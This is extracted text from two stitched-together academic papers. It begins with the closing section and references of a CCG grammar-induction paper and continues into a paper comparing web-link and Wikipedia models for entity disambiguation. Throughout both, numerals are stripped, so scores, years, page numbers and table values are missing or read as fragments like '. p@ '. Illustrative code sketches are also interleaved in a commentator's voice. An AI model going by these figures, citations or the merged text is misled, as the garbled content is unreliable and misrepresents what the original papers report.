by not faltering on longer sentences or requiring extensive tuning, the system can be easily and quickly deployed on a new lan- guage and return state of the art performance and easily interpretable lexicons. in this paper, we have applied this model only to a restricted fragment of ccg, but future work will address the impact of lex- icalization and the inclusion of richer combinators. acknowledgements this work is supported by nsf career award (bayesian models for lexicalized gram- mars). references taylor berg-kirkpatrick and dan klein. . phyloge- netic grammar induction. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, july. christopher bishop. . pattern recognition and ma- chine learning. springer-verlag, august. yonatan bisk and julia hockenmaier. a. induction of linguistic structure with combinatory categorial grammars. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. yonatan bisk and julia hockenmaier. b. simple robust grammar induction with combinatory cate- gorial grammars. in proceedings of the twenty-sixth conference on artificial intelligence (aaai- ), pages – , toronto, canada, july. david m blei and michael i jordan. . variational methods for the dirichlet process. in proceedings of the twenty-first international conference on machine learning (icml ), banff, alberta, canada, july. phil blunsom and trevor cohn. . unsupervised induction of tree substitution grammars for depen- dency parsing. proceedings of the conference on empirical methods of natural language process- ing, pages – , october. prachya boonkwan and mark steedman. . gram- mar induction from text using small syntactic proto- types. in proceedings of th international joint con- ference on natural language processing, pages – , chiang mai, thailand, november. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of the th conference on computational natural language learning (conll-x), pages – , new york city, june. glenn carroll and eugene charniak. . two exper- iments on learning probabilistic dependency gram- mars from corpora. working notes of the workshop statistically-based nlp techniques, pages – . eugene charniak. . statistical language learning. the mit press, cambridge, massachusetts. stephen clark and james r curran. . formalism- independent parser evaluation with ccg and dep- bank. in proceedings of the th annual meeting of the association of computational linguistics, pages – , prague, czech republic, june. alex clark. . unsupervised language acquisition: theory and practice. ph.d. thesis, university of sus- sex, september. shay b cohen and noah a smith. . variational inference for grammar induction with prior knowl- edge. proceedings of the acl-ijcnlp confer- ence short papers, pages – . shay b cohen and noah a smith. . covariance in unsupervised learning of probabilistic grammars. the journal of machine learning research, pages – , november. trevor cohn, phil blunsom, and sharon goldwater. . inducing tree-substitution grammars. the journal of machine learning research, : – , november. michael collins. . head-driven statistical mod- els for natural language parsing. computational lin- guistics, ( ): – , december. gregory druck, gideon mann, and andrew mccal- lum. . semi-supervised learning of dependency parsers using generalized expectation criteria. 
in proceedings of the joint conference of the th an- nual meeting of the acl and the th international joint conference on natural language processing of the afnlp, pages – , suntec, singapore, au- gust. jason eisner. . efficient normal-form parsing for combinatory categorial grammar. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , santa cruz, cali- fornia, usa, june. douwe gelling, trevor cohn, phil blunsom, and joão v graca. . the pascal challenge on grammar induction. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. jennifer gillenwater, kuzman ganchev, joão v graca, fernando pereira, and ben taskar. . sparsity in dependency grammar induction. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , uppsala, swe- den, july. jennifer gillenwater, kuzman ganchev, joão v graca, fernando pereira, and ben taskar. . posterior sparsity in unsupervised dependency parsing. the journal of machine learning research, : – , february. yoav goldberg. . automatic syntactic processing of modern hebrew. ph.d. thesis, ben-gurion university of the negev, november. william p headden iii, mark johnson, and david mc- closky. . improving unsupervised dependency parsing with richer contexts and smoothing. in pro- ceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – , boulder, colorado, june. julia hockenmaier and yonatan bisk. . normal- form parsing for combinatory categorial grammars with generalized composition and type-raising. in proceedings of the rd international conference on computational linguistics (coling ), pages – , beijing, china, august. coling organizing committee. julia hockenmaier and mark steedman. . gener- ative models for statistical parsing with combinatory categorial grammar. in proceedings of th annual meeting of the association for computational lin- guistics, pages – , philadelphia, pennsylvania, usa, july. julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. com- putational linguistics, ( ): – , september. yun huang, min zhang, and chew lim tan. . improved combinatory categorial grammar induc- tion with boundary words and bayesian inference. in proceedings of the rd international conference on computational linguistics (coling ), mumbai, india, december. ray jackendoff. . x-bar syntax: a study of phrase structure. the mit press. dan klein and christopher d manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in proceedings of the nd meeting of the association for computational linguistics (acl’ ), main volume, pages – , barcelona, spain, july. kenichi kurihara and taisuke sato. . an appli- cation of the variational bayesian approach to prob- abilistic context-free grammars. international joint conference on natural language language process- ing workshop beyond shallow analyses, march. kenichi kurihara, max welling, and yee-whye teh. . collapsed variational dirichlet process mix- ture models. in proceedings of the th international joint conference on artificial intelligence (ijcai ), pages – , hyderabad, india, january. tom kwiatkowski, sharon goldwater, luke zettlemoyer, and mark steedman. . a probabilistic model of syntactic and semantic acquisition from child-directed utterances and their meanings. 
in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics, pages – , avignon, france, april. association for compu- tational linguistics. karim lari and steve j young. . applications of stochastic context-free grammars using the inside- outside algorithm. computer speech & language, ( ): – , january. percy liang, slav petrov, michael i jordan, and dan klein. . the infinite pcfg using hierarchical dirichlet processes. in proceedings of the joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning (emnlp-conll), pages – , prague, czech republic. percy liang, michael i jordan, and dan klein. . probabilistic grammars and hierarchical dirichlet processes. in the oxford handbook of applied bayesian analysis. oxford university press. mitchell p marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computa- tional linguistics, ( ): – , june. david marecek and zdenek zabokrtsky. . unsu- pervised dependency parsing using reducibility and fertility features. in naacl hlt workshop on induc- tion of linguistic structure, pages – , montréal, canada, june. tahira naseem, harr chen, regina barzilay, and mark johnson. . using universal linguistic knowl- edge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , jeju, republic of korea, july. joakim nivre. . inductive dependency parsing. springer. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of the th international conference on language re- sources and evaluation (lrec- ), pages – , istanbul, turkey, may. anders søgaard. . two baselines for unsuper- vised dependency parsing. in naacl hlt work- shop on induction of linguistic structure, pages – , montréal, canada, june. valentin i spitkovsky, hiyan alshawi, and daniel juraf- sky. . from baby steps to leapfrog: how “less is more” in unsupervised dependency parsing. in hu- man language technologies: the annual con- ference of the north american chapter of the associ- ation for computational linguistics, pages – , los angeles, california, june. mark steedman. . surface structure and interpre- tation. the mit press, january. mark steedman. . the syntactic process. the mit press, september. yee-whye teh, michael i jordan, matthew j beal, and david m blei. . hierarchical dirichlet pro- cesses. journal of the american statistical associa- tion, ( ): – . yee-whye teh. . a hierarchical bayesian lan- guage model based on pitman-yor processes. in pro- ceedings of the st international conference on com- putational linguistics and th annual meeting of the association for computational linguistics, pages – , sydney, australia, july. yee-whye teh. . dirichlet process. in encyclope- dia of machine learning, pages – . springer. kewei tu. . combining the sparsity and unambi- guity biases for grammar induction. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. entity disambiguation with web links andrew chisholm school of information technologies university of sydney nsw , australia andy.chisholm. 
@gmail.com ben hachey school of information technologies university of sydney nsw , australia ben.hachey@gmail.com abstract entity disambiguation with wikipedia relies on structured information from redirect pages, article text, inter-article links, and categories. we explore whether web links can replace a curated encyclopaedia, obtaining entity prior, name, context, and coherence models from a corpus of web pages with links to wiki- pedia. experiments compare web link models to wikipedia models on well-known conll and tac data sets. results show that using million web links approaches wikipedia performance. combin- ing web link and wikipedia models produces the best-known disambiguation accuracy of . on standard newswire test data. introduction entity linking (el) resolves mentions in text to their corresponding node in a knowledge base (kb), or nil if the entity is not in the kb. wikipedia and related semantic resources – freebase, dbpedia, yago – have emerged as general repositories of no- table entities. the availability of wikipedia, in par- ticular, has driven work on el, knowledge base pop- ulation (kbp), and semantic search. this literature demonstrates that the rich structure of wikipedia– redirect pages, article text, inter-article links, cat- egories – delivers disambiguation accuracy above % on newswire (he et al., ; alhelbawy and gaizauskas, ). but what disambiguation accu- racy can we expect in the absence of wikipedia’s curated structure? web links provide much of the same information as wikipedia inter-article links: anchors are used to derive alternative names and conditional probabili- ties of entities given names; in-link counts are used to derive a simple entity popularity measure; the text surrounding a link is used to derive textual con- text models; and overlap of in-link sources is used to derive entity cooccurrence models. on the other hand, web links lack analogues of additional wiki- pedia structure commonly used for disambiguation, e.g., categories, encyclopaedic descriptions. more- over, wikipedia’s editors ensure a clean and correct knowledge source while web links are a potentially noisier annotation source. we explore linking with web links versus wiki- pedia. contributions include: ( ) a new bench- mark linker that instantiates entity prior probabili- ties, entity given name probabilities, entity context models, and efficient entity coherence models from wikipedia-derived data sets; ( ) an alternative linker that derives the same model using only alternative names and web pages that link to wikipedia; ( ) de- tailed development experiments, including analysis and profiling of web link data, and a comparison of link and wikipedia-derived models. results suggest that web link accuracy is at least % of a wikipedia linker and that web links are complementary to wikipedia, with the best scores coming from a combination. we argue that these re- sults motivate open publishing of enterprise author- ities and suggest that accumulating incoming links should be prioritised at least as highly as adding richer internal structure to an authority. transactions of the association for computational linguistics, vol. , pp. – , . action editor: ryan mcdonald. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. related work thomas et al. ( ) describe a disambiguation ap- proach that exploits news documents that have been curated by professional editors. 
in addition to con- sistently edited text, these include document-level tags for entities mentioned in the story. tags are exploited to build textual mention context, assign weights to alternative names, and train a disam- biguator. this leads to an estimated f score of . for end-to-end linking to a kb of , com- panies. our work is similar, but we replace qual- ity curated news text with web pages and explore a larger kb of more than four million entites. in place of document-level entity tags, hyperlinks pointing to wikipedia articles are used to build context, name and coherence models. this is a cheap form of third- party entity annotation with the potential for gener- alisation to any type of web-connected kb. how- ever, it presents an additional challenge in coping with noise, including prose that lacks editorial over- sight and links with anchor text that do not corre- spond to actual aliases. li et al. ( ) explore a similar task setting for microblogs, where short mention contexts exacer- bate sparsity problems for underdeveloped entities. they address the problem by building a topic model based on wikipedia mention link contexts. a boot- strapping approach analogous to query expansion augments the model using web pages returned from the google search api. results suggest that the bootstrapping process is beneficial, improving per- formance from approximately % to % accu- racy. we demonstrate that adding link data leads to similar improvements. the cold start task of the text analysis confer- ence is also comparable. it evaluates how well sys- tems perform end-to-end nil detection, clustering and slot filling. input includes a large document col- lection and a slot filling schema. systems return a kb derived from the document collection that con- forms to the schema. the evaluation target is long- tail or local knowledge. the motivation is the same as our setting, but we focus on cold-start linking rather than end-to-end kb population. finally, recent work addresses linking without http://www.nist.gov/tac/ /kbp/ coldstart/guidelines.html and beyond wikipedia. jin et al. ( ) describe an unsupervised system for linking to a person kb from a social networking site, and shen et al. ( ) de- scribe a general approach for arbitrary kbs. nakas- hole et al. ( ) and hoffart et al. ( ) add a tem- poral dimension to nil detection by focusing on dis- covering and typing emerging entities. tasks and art two evaluations in particular have driven compar- ative work on el: the tac kbp shared tasks and the yago annotation of conll ner data. we describe these tasks and their respective evaluation setup. a brief survey of results outlines the kind of performance we hope to achieve with link data. for task history, we suggest hachey et al. ( ) and shen et al. ( ). for an evaluation survey, see hachey et al. ( ). our evaluation setup follows he et al. ( ) for comparability to their state-of-the-art disambigua- tion results across conll and tac data. table summarises the data sets used. columns correspond to number of documents (|d|), number of entities (|e|), number of mentions (|m|), and number of non-nil mentions (|mkb|). the non-nil mention number represents the set used for evaluation in the disambiguation experiments here. the table also in- cludes average and standard deviation of the candi- date set cardinality over mkb (〈c〉) and the percent- age of mentions in mkb where the correct resolu- tion is in the candidate set (rc). 
the last column (soa) gives the state-of-the-art score from the liter- ature. numbers are discussed below. . conll conll is a corpus of reuters newswire annotated for whole-document named entity recognition and disambiguation (hoffart et al., ). conll is pub- lic, free and much larger than most entity annota- tion data sets, making it an excellent evaluation tar- get. it is based on the widely used ner data from the conll shared task (tjong kim sang and meulder, ), building disambiguation on ground truth mentions. training and development splits comprise , stories from - august and the held-out test split comprises stories from - december . http://www.nist.gov/tac/ /kbp/coldstart/guidelines.html http://www.nist.gov/tac/ /kbp/coldstart/guidelines.html data set |d| |e| |m| |mkb| (%) 〈c〉 (σ) rc soa conll train , , , ( ) ( ) na conll dev , , , ( ) ( ) . conll test , , , ( ) ( ) . tac train , , , ( ) ( ) . na tac test , , , ( ) ( ) . . table : data sets for disambiguation tasks addressed here. statistics are described in section . the standard evaluation measure is precision@ (p@ ) – the percentage of linkable mentions for which the system ranks the correct entity first (hof- fart et al., ). linkable is defined as ground truth mentions for which the correct entity is a member of the candidate set. this factors out errors due to mention detection, coreference handling, and can- didate generation, isolating the performance of the proposed ranking models. for comparability, we use hoffart et al.’s yago means relations for candidate generation. these alternative names are harvested from wikipedia disambiguation pages, redirects and inter-article links. in the hoffart et al. setting, can- didate recall is %. there are several key benchmark results for the conll data set. hoffart et al. ( ) define the task settings and report the first results. they employ a global graph-based coherence algorithm, leading to a score of . . he et al. ( ) present the most comparable approach. using deep neural networks, they learn entity representations based on similar- ity between link contexts and article text in wiki- pedia. they report performance of . without collective inference, and . when integrating han et al.’s ( ) coherence algorithm. finally, al- helbawy and gaizauskas ( ) report the current best performance of . using a collective approach over a document-specific subgraph. . tac since , the text analysis conference (tac) has hosted an annual el shared task as part of its knowl- edge base population track (kbp) (ji and grishman, ). through , the task is query-driven. in- put includes a document and a name that appears in that document. systems must output a kb identifier for each query, or nil. the kb is derived from a subset of , wikipedia articles. we use data from the shared task for several reasons. first, it facilitates comparison to current art. second, it is a linking-only evaluation as opposed to linking plus nil clustering. finally, it includes comparable train- ing and test data rather than relying on data from earlier years for training. the tac source collection includes news from various agencies and web log data. train- ing data includes a specially prepared set of , web queries. test data includes , queries – , news and web log uniformly distributed across person, organisation, and geo-political en- tities. candidate generation here uses the dbpe- dia lexicalizations data set (mendes et al., ), article titles, and redirect titles. 
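a minimal sketch of the precision@ measure described above: only linkable mentions (those whose gold entity survives candidate generation) are scored, and a mention counts as correct when the top-ranked candidate equals the gold entity. the dictionary layout and the example mentions are illustrative.

```python
# precision@1 over linkable mentions, factoring out candidate-generation errors.
def precision_at_1(mentions):
    """mentions: iterable of dicts with keys 'gold' and 'candidates' (ranked list)."""
    linkable = [m for m in mentions if m['gold'] in m['candidates']]
    correct = sum(1 for m in linkable if m['candidates'][0] == m['gold'])
    return correct / len(linkable) if linkable else 0.0

example = [
    {'gold': 'Tesla_Motors', 'candidates': ['Tesla_Motors', 'Nikola_Tesla']},
    {'gold': 'Nikola_Tesla', 'candidates': ['Tesla_Motors', 'Nikola_Tesla']},
    {'gold': 'Tesla_(band)', 'candidates': ['Tesla_Motors']},  # not linkable
]
print(precision_at_1(example))  # 0.5
```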
we also add ti- tles and redirects stripped of appositions indicated by a comma (e.g., montgomery, alabama) or opening round bracket (e.g., joe morris (trumpeter)). candidate recall is . and . on the training and test sets – an upper limit on dis- ambiguation accuracy. following he et al., we report kb accuracy (akb ) - the percentage of correctly linked non-nil men- tions - to isolate disambiguation performance. be- fore evaluation, we map wikipedia titles in our out- put to tac kb identifiers using the dalton and di- etz ( ) alignment updated with wikipedia redi- rects. to our knowledge, cucerzan ( ) report the best akb of . for an end-to-end tac entity linking system, while he et al. ( ) report the best akb of . for a disambiguation-focused evaluation. there are a number of differences, e.g.: mention detection for coherence, coreference modelling, and substring matching in candidate generation. analysis shows that these can have a large effect on system perfor- mance (hachey et al., ; piccinno and ferragina, ). we use he et al.’s setup to control for differ- ences and for comparability to he et al.’s results. component articles mentions web links fprior . . . fname . . . fbow . . . fdbow . . . table : p@ results for individual components on the conll development data. the first two columns corre- spond to the wikipedia models described in section . , one derived from article text and the other from mention contexts. the last column corresponds to the web link models described in section . wikipedia benchmark models a wide range of el approaches have been proposed that take advantage of the clean, well-edited infor- mation in wikipedia. these include entity prior models derived from popularity metrics; alias mod- els derived from wikipedia redirects, disambigua- tion pages and inter-article links; textual context models derived from wikipedia article text; and en- tity coherence models derived from the wikipedia inter-article link graph. we survey these models and describe a new benchmark linker that instantiates them from existing wikipedia-derived data sets. for a more detailed survey of features in supervised sys- tems, see meij et al. ( ) and radford ( ). table contains an overview of p@ results for individual components on the conll development data. . entity prior the simplest approach to entity disambiguation ranks candidate entities in terms of their popu- larity. for example, . % of inter-article links in wikipedia point to nikola tesla, while . % point to tesla motors. an entity prior is used in generative models (guo et al., ; han and sun, ) and in supervised systems that incorporate diverse features (radford et al., ). we define the entity prior as the probability of a link pointing to entity e: fprior(e) = log |i∗,e| |i∗,∗| where i∗,e ∈ i∗,∗ is the set of pages that link to entity e. we derive this from dbpedia’s wikipedia pagelinks data set, which contains the link graph between wikipedia pages. missing values are re- placed with a small default log probability of - , which works better than add-one smoothing in de- velopment experiments. on the conll development data, entity prior alone achieves . p@ . . name probability name probability models the relationship between a name and an entity. for example, . % of links with the anchor text ‘tesla’ point to nikola tesla, while . % point to tesla motors. 
name probability was introduced as an initial score in coherence-driven disambiguation (milne and wit- ten, ), and is used in most state-of-the-art sys- tems (ferragina and scaiella, ; hoffart et al., ; cucerzan, ; radford et al., ). we define name probability as the conditional probabil- ity of a name referring to an entity: fname(e,n) = log |mn,e| |mn,∗| where mn,e is the set of mentions with name n that refer to entity e and mn,∗ is all mentions with name n. we use existing conditional probability estimates from the dbpedia lexicalizations data set (mendes et al., ). this derives mentions from wikipedia inter-article links, where names come from anchor text and referent entities from link targets. estimates for entities that have fewer than five incoming links are discarded. we smooth these estimates using add- one smoothing. on the conll development data, name probability alone achieves . p@ . . textual context textual context goes beyond intrinsic entity and name popularity, providing a means to distinguish between entities based on the words with which they occur. for example, references to tesla the car manufacturer appear in passages with words like ‘company’, ‘electric’, ‘vehicle’. references to the inventor appear with words like ‘engineer’, ‘ac’, ‘electrical’. textual context was the primary com- ponent of the top system in the first tac evaluation (varma et al., ), and is a key component in re- cent art (ratinov et al., ; radford et al., ). http://wiki.dbpedia.org/downloads http://wiki.dbpedia.org/downloads bow context we model textual context as a weighted bag of words (bow), specifically as a term vector ~t containing tfidf weights: tfidf(t,p) = √ f(t,p) · log ( |d| |{d ∈d|t ∈ d}| ) where t is a term, p is a passage of text, f(t,p) is the term frequency of t in p, |d| is the total num- ber of documents, and {d ∈ d|t ∈ d} is the num- ber of documents containing t (salton and buckley, ). we derive the term frequency for an entity e from the corresponding article content in the kopi- wiki plain text extraction (pataki et al., ). terms include three million token - grams from mikolov et al. ( ), with the top by document frequency as stop words. candidate entities are scored using cosine distance between a mention context ~tm and the entity model ~te: fbow(m,e) = − cos(~tm,~te) = − ~tm ·~te ‖~tm‖‖~te‖ on the conll development data, bow context de- rived from wikipedia article text achieves . p@ . we also build entity models from their mention con- texts, i.e., the combined text surrounding all incom- ing links. we project mentions into kopiwiki article text, which yields more contexts than actual wiki- pedia links. for an article a, we tag as mentions all aliases of entities linked to from a. we use aliases from yago means relations (see section . ). to ensure high precision, we only use aliases that are unambiguous with respect to the outlink set, have a length of at least two characters, include at least one upper-case character, and are not a member of the nltk stop list. this is a noisy process, but gives us a pivot to assess whether differences observed later between wikipedia and web link models are due the way the context is modelled or the source of the con- text. the term frequency for an entity e is calculated over the concatenation of all contexts for e. bow context derived from mentions achieves . p@ on the conll development data, five points higher than article text. 
dbow context while bow context models have been very successful, they require exact matching between terms and a large vocabulary. distribu- tional approaches model terms or concepts as se- mantic vectors (pereira et al., ). dimensional- ity reduction and deep learning improve generalisa- tion and reduce vector size (baroni et al., ). he et al. (he et al., ) report excellent performance using entity representations that optimise the simi- larity between mention contexts and article text in wikipedia. however, this approach necessitates an expensive training process and significant run-time complexity. we introduce a simple distributed bag- of-words (dbow) model that represents context as the tfidf-weighted average over word vectors v: ~vp = |tp| ∑ t∈tp tfidf(t,p) ·~vt where tp is the set of terms in passage p, and ~vt ∈v is the learnt word vector for term t. we use existing -dimensional word embeddings (mikolov et al., ) and score candidates using cosine distance be- tween mention context ~vm and the entity model ~ve: fdbow(m,e) = − cos(~vm,~ve) on the conll development data, dbow context models derived from article text and mention con- text achieve . and . respectively. web link models the models above all have direct anologues in web links to wikipedia articles. however, web links are a comparatively noisy source. for instance, anchors are less likely to be well-formed entity mentions, e.g., in links to semantic web we observe ‘se- mantic markup’ and ‘semantic web activity’ as an- chors. a lack of curation and quality control also allows for the misdirection of links. for exam- ple, we observe links to apple the fruit where the surrounding context indicates an intention to link apple inc instead. it is an open question whether link-derived models are effective in disambiguation. below, we describe how models are instantiated using link data. we leverage the wikilinks corpus of million web pages containing a total of mil- lion links to . million wikipedia pages (singh et al., ). this includes links to english wikipedia pages that pass the following tests: ( ) the page must not have > % of sentences in common with a wikipedia article; ( ) the link must not be inside wikipedia web links pages . m . m entities . m . m pairs . m . m table : comparison of page-entity link graphs from wikipedia and wikilinks (in millions). these graphs are the basis for entity prior features (sections . , . ). a table, near an image, or in obvious boilerplate ma- terial; ( ) at least one token in the anchor text must match a token in the wikipedia title; and ( ) the an- chor text must match a known alias from wikipedia. the corpus provides the web page url, the link an- chor, and local textual content around each link. refer back to table for p@ results for individ- ual web link components on the development data. . entity prior to instantiate fprior, we build a page-entity link graph from wikilinks. where pages and entities are the same in the wikipedia graph, here we have an unweighted bipartite graph of links from web pages to wikipedia articles. on the conll development data, the link-derived entity prior achieves . p@ . table characterises the two graphs. note that the high entity count for wikipedia here includes red links to articles that do not exist. the actual number of entities used in the wikipedia model is . mil- lion. nevertheless, while the two graphs have a sim- ilar number of pages that contain links, wikipedia includes three times as many link pairs to . times as many entities. 
furthermore, entities average . incoming links in the wikipedia graph, compared to . in the wikilinks graph. nevertheless, the indi- vidual performance of the web link prior is only . points shy of the corresponding wikipedia prior. relative frequencies in wikipedia and wikilinks are similar, especially for entities that show up in the evaluation data. we observe a moderate correla- tion between entity priors from wikipedia and wik- ilinks (ρ = . , p < . ), and a strong correlation across the subset of entities that occur in the devel- opment data (ρ = . , p < . ). . name probability to instantiate fname, we build a name-entity graph from wikilinks. the structure is the same as the cor- wikipedia web links names . m . m entities . m . m table : comparison of name-entity link graphs from wikipedia and wikilinks (in millions). these graphs are the basis for name probability features (sections . , . ). responding model from wikipedia, both are bipar- tite graphs with cooccurrence frequencies on edges. however, names here are sourced from link anchors in web pages rather than wikipedia articles. for comparability with the wikipedia model, we ignore links to entities that occur fewer than five times. we observed no improvement using all links in develop- ment experiments. on the conll development data, link-derived name probability achieves . p@ , more than ten points shy of the wikipedia-derived name probability. table helps to explain this dif- ference. wikilinks has twice as many names linking to the same number of entities, resulting in more am- biguity and sparser models. . textual context to instantiate fbow and fdbow, we follow the same methodology used for wikipedia mention contexts. the term frequency for an entity e is calculated over the concatenation of mention contexts for e. docu- ment frequency is also calculated across aggregated entity contexts. mention contexts include all text in- cluded in the wikilinks data, a window of tokens on average centred on the link anchor. section . showed that wikipedia mention contexts give bet- ter individual performance than wikipedia article texts. web link mentions result in even better per- formance. on the conll development data, bow context achieves . p@ , ten points higher than commonly used wikipedia article model and seven points higher than the analogous wikipedia mention model. dbow context achieves . p@ , . points higher than the wikipedia mention model. table compares wikipedia and wikilinks cov- erage of entities from the conll development set. the second column (|e|) contains the number of unique entities that have usable context. note that the entity universe we consider here is all article pages in english wikipedia ( , , total from the december kopiwiki data set). the third |e| cove covm joint articles , , . mentions , . web links , , . table : coverage of textual context models for each source over entities (e) and mentions (m). t̄e t̄m articles mentions web links table : mean in-vocab tokens per entity (t̄e ) and tokens per mention (t̄m) for each textual context model. and fourth columns correspond to coverage of enti- ties (cove) and mentions (covm) from the conll data set. mention coverage exceeds entity cover- age, highlighting the relationship with prevalence in newswire. the last column contains p@ for the subset of mentions in conll for which the correct resolution is covered by both articles and web links. this isolates context source, demonstrating that link contexts outperform article text. 
table compares context size in wikilinks to wikipedia. wikilinks bow models are approximately twice the size of wikipedia article models and half the size of wikipedia mention models. this helps to explain why individual mention and link models outperform individual article models.

learning to rank

to perform disambiguation, we first extract a set of real-valued features for each candidate entity e given a training set of mentions m. feature values are standardised to have zero mean and unit variance. parameters of the training distribution are saved for consistent standardisation of test data. we train a support vector machine (svm) classifier to perform pairwise ranking (joachims, ). for each mention in the training set, we derive training instances by comparing the feature vector of the gold link ($\vec{f}_g$) with each non-gold candidate ($\vec{f}_c$):

$(x_i, y_i) = \begin{cases} (\vec{f}_g - \vec{f}_c,\; +) & \text{if } i \text{ is odd} \\ (\vec{f}_c - \vec{f}_g,\; -) & \text{otherwise} \end{cases}$

we create instances for the top-ten non-gold candidates by sum of absolute feature values:

$\mathrm{activation}(c) = \sum_{i=1}^{|\vec{f}_c|} |\vec{f}_{c,i}|$

in development experiments, this outperformed random selection and difference in activation. class assignment is alternated to balance the training set. to capture non-linear feature relationships we incorporate a degree- polynomial kernel via explicit feature mapping (chang et al., ). regularisation parameters are selected via grid search over the development set. our final model utilises an l loss function, l weight penalty and c ≈ . .

figure : individual (i) and cumulative (c) results for basic features (prior, name, bow, dbow) on the conll development data, covering the articles, mentions, web links, combined, and optimal configurations. combined includes all features while optimal includes the best subset. optimal tracks combined closely, but is just higher.

. feature selection

sections and describe a total of ten model components, six from wikipedia and four from wikilinks. we select the optimal combination through exhaustive search. figure includes individual and cumulative results on the conll development data. the article, mention and web link models each attain their best performance with all component features (entity, name, bow, and dbow): . , . , and . respectively. adding mention context features doesn't improve the more conventional wikipedia article model. combining all features gives . , while the optimal configuration achieves . without wikipedia mention contexts. in the remaining experiments, optimal refers to wikipedia article plus web link features and wikipedia refers to article features alone.

figure : svm learning curves for the best configurations (wikipedia, web links, optimal).

. effect of training data size

figure compares learning curves for each model on conll development data. the x-axis corresponds to p@ scores and the y-axis corresponds to the number of (randomly selected) mentions used in training. all models stabilise early, suggesting , annotated mentions are sufficient for the svm to learn feature weights. possibly due to higher quality and consistency of features, the wikipedia model stabilises earlier, before , annotated mentions.

. ablation analysis

figure contains an ablation analysis for wikipedia and web link features, as well as the optimal overall combination of both. the most striking effect is due to the popularity components. removing entity prior features reduces p@ by .
for wikipedia and . for web link. removing name probability reduces p@ by . for wikipedia and . for web link. in the overall model, the wikipedia popularity components have a much larger impact (prior: - . , name: - . ) than the web link popularity components (prior: - . , name: - . ). these results show the impact of noisy web links, which appears to be worse for name probability modelling. for context, removing dbow features has a larger impact than bow for both wikipedia (bow: - . , dbow: - . ) and web link (bow: - . , dbow: - . ). all individual context features have a small impact on the overall model despite redundancy.

figure : ablation analysis of the best configurations (wikipedia, web links, optimal), showing the change in p@ when each feature (wikipedia prior, wikipedia name, article bow, article dbow, web link prior, web link name, web link bow, web link dbow) is removed.

adding coherence

the model combinations above provide a strong, scalable baseline based on popularity and entity context. another approach to context leverages the wikipedia link graph to explicitly model the coherence among possible resolutions. here, systems define some measure of entity-entity relatedness and maximise the coherence of entity assignments across the query document as a whole. this can be done using global methods over the entity link graph (hoffart et al., ), but these have high runtime complexity. we employ a simple approach based on conditional probabilities:

$p_{\mathrm{coh}}(a \mid b) = \frac{|I_a \cap I_b|}{|I_b|}$

where $I_e$ is the set of documents that link to entity $e$. the candidate-level feature is the average:

$f_{\mathrm{cond}}(e) = \frac{1}{|C|} \sum_{c \in C} \log p_{\mathrm{coh}}(e \mid c)$

where $C$ is the set of context entities for candidate entity $e$. for wikipedia and web link coherence, $I_e$ models are derived respectively from the set of other articles that link to e and from the set of web pages that link to e. given the same initial ranking from the optimal base model, wikipedia and web link coherence models alone achieve . and . .

. a two-stage classifier

to incorporate coherence, we use a two-stage classifier. first, we obtain an initial candidate ranking for each mention using the basic model described in section above, and populate c from the top-one candidate for each unique context name. a second classifier incorporates all features, including basic components and coherence. given the same initial ranking, adding coherence improves individual wikipedia and web link models . and . points to . and . p@ on the conll development data. these results suggest that coherence is a powerful feature to overcome low scores in the basic web link model. but coherence only improves the optimal combination of basic wikipedia and web link features by . point to . . this suggests coherence may not contribute much on top of an already strong set of basic features.

table : web link components vs. wikipedia — popularity (pop) and context (ctx) results on (a) conll and (b) tac (values not recoverable from this copy).

final experiments

we report final experiments on the held-out conll and tac test sets. as described in section above, we report p@ for conll following hoffart et al. ( ) and akb for tac following he et al. ( ). we use a reference implementation to compute evaluation measures and pairwise significance (hachey et al., ). we bold the superior configuration for each column only if the difference is significant (p < . ).
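before turning to the results, the conditional-probability coherence feature above can be illustrated with a short sketch. the inlink sets, the epsilon used to avoid log(0), and the function names below are our own assumptions; in particular, the paper does not specify how empty intersections are handled.

```python
# illustrative sketch of the conditional-probability coherence feature.
# the epsilon smoothing for empty intersections is an assumption of this sketch.
import math

def p_coh(inlinks_a, inlinks_b):
    """p_coh(a|b) = |I_a ∩ I_b| / |I_b|, where I_e is the set of documents linking to e."""
    if not inlinks_b:
        return 0.0
    return len(inlinks_a & inlinks_b) / len(inlinks_b)

def f_cond(candidate, context_entities, inlinks, eps=1e-12):
    """f_cond(e): average of log p_coh(e|c) over the context entities c."""
    if not context_entities:
        return 0.0
    total = sum(math.log(p_coh(inlinks[candidate], inlinks[c]) + eps)
                for c in context_entities)
    return total / len(context_entities)

if __name__ == "__main__":
    inlinks = {"Apple_Inc.": {"d1", "d2", "d3"}, "IPhone": {"d2", "d3"}, "Apple": {"d9"}}
    for cand in ("Apple_Inc.", "Apple"):
        print(cand, round(f_cond(cand, ["IPhone"], inlinks), 3))  # higher is more coherent
```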
. results

can link components replace kb components? table compares performance of basic model components. the popularity (pop) column contains results using just entity prior and name probability features. the context (ctx) column contains results using just bow and dbow features. results follow trends observed in development experiments. specifically, wikipedia popularity models are better, but web link context models are better. interestingly, web link popularity is statistically indistinguishable from wikipedia popularity on tac data. this may be attributed to the fact that tac selectively samples difficult mentions.

table : web link combinations vs. wikipedia — results for the base feature set and with coherence (+coh) on (a) conll and (b) tac (values not recoverable from this copy).

table : web links complement wikipedia — results for wikipedia alone and wikipedia plus web links, base and +coh, on (a) conll and (b) tac (values not recoverable from this copy).

